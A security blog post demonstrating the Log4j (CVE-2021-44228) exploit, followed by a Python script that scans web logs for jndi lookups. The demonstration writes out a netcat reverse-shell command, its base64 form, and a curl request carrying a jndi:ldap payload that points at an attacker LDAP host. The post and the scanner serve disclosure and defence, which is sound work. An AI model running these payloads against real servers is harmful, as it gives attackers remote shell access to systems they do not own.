Researcher: Alan Ho
A critical vulnerability in Apache Log4j was discovered and published; it has a huge impact on countless servers.
There are already posts describing the details of the vulnerability (CVE-2021-44228), so we are just going to demonstrate how this vulnerability can be exploited.
We have prepared two servers in AWS: one acts as the vulnerable server, which is running an exploitable version of log4j.
The other server runs a malicious LDAP server and a netcat listener for the remote shell.
Since the malicious LDAP server supports base64-encoded commands via the path:
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
We prepare the command:
nc 3.86.225.135 4444 -e /bin/sh
and base64 encode it.
With all the servers and the command in place, we launch the attack:
curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}'
The vulnerable server encountered errors.
The malicious LDAP server received the request, and the vulnerable server is owned.
Video demonstration:
From this simple demonstration: as long as the malicious LDAP server is set up, it is easy to launch the attack and own the server.
Please check your applications and update to a version in which the issue has been fixed.
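The request above is the kind of thing a defender should be hunting for in web access logs. As an added example (not from the original post), the following Python scans constructed reverse-proxy log lines for `${jndi:...}` lookups in logged header values, extracts the scheme, host and port the lookup would reach out to, and decodes a `/Base64/<blob>` path segment of the format shown above for triage; the log layout, header names and addresses are assumptions made up for the example.

```python
import re
import base64
import binascii
from urllib.parse import urlsplit

# Constructed sample log lines (not from the original post): client IP,
# request line, status, then the request headers the proxy logs.
SAMPLE_LOG = [
    '10.0.0.5 "GET / HTTP/1.1" 200 user-agent="curl/7.79" x-api-version="1.0"',
    '10.0.0.7 "GET / HTTP/1.1" 500 user-agent="curl/7.79" '
    'x-api-version="${jndi:ldap://198.51.100.10:1389/Basic/Command/Base64/aWQ=}"',
    '10.0.0.9 "GET /health HTTP/1.1" 200 '
    'user-agent="${JNDI:RMI://198.51.100.11:1099/obj}" x-api-version="1.0"',
]

# Log4j lookups have the form ${name:argument}; the dangerous one is the
# jndi lookup, whose argument is a URI such as ldap://, rmi:// or dns://.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([^}]*)\}", re.IGNORECASE)


def decode_base64_segment(path):
    """Decode a /Base64/<blob> path segment (assumed layout) for triage, else None."""
    marker = "/Base64/"
    if marker not in path:
        return None
    blob = path.split(marker, 1)[1].split("/", 1)[0]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def find_jndi_lookups(line):
    """Return one finding dict per ${jndi:...} lookup present in a log line."""
    findings = []
    for m in JNDI_RE.finditer(line):
        uri = m.group(1).strip()
        parts = urlsplit(uri)  # urlsplit lowercases the scheme for us
        findings.append({
            "lookup": m.group(0),
            "scheme": parts.scheme,
            "host": parts.hostname,
            "port": parts.port,
            "path": parts.path,
            "decoded_command": decode_base64_segment(parts.path),
        })
    return findings


def scan_log(lines):
    """Scan log lines; return (line_number, client_ip, finding) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        client = line.split(" ", 1)[0]
        for finding in find_jndi_lookups(line):
            hits.append((n, client, finding))
    return hits
```

Matching only the literal `${jndi:` prefix is a starting point, not a complete rule; the durable fix remains upgrading Log4j, with the scanner serving to find hosts that were probed before the upgrade.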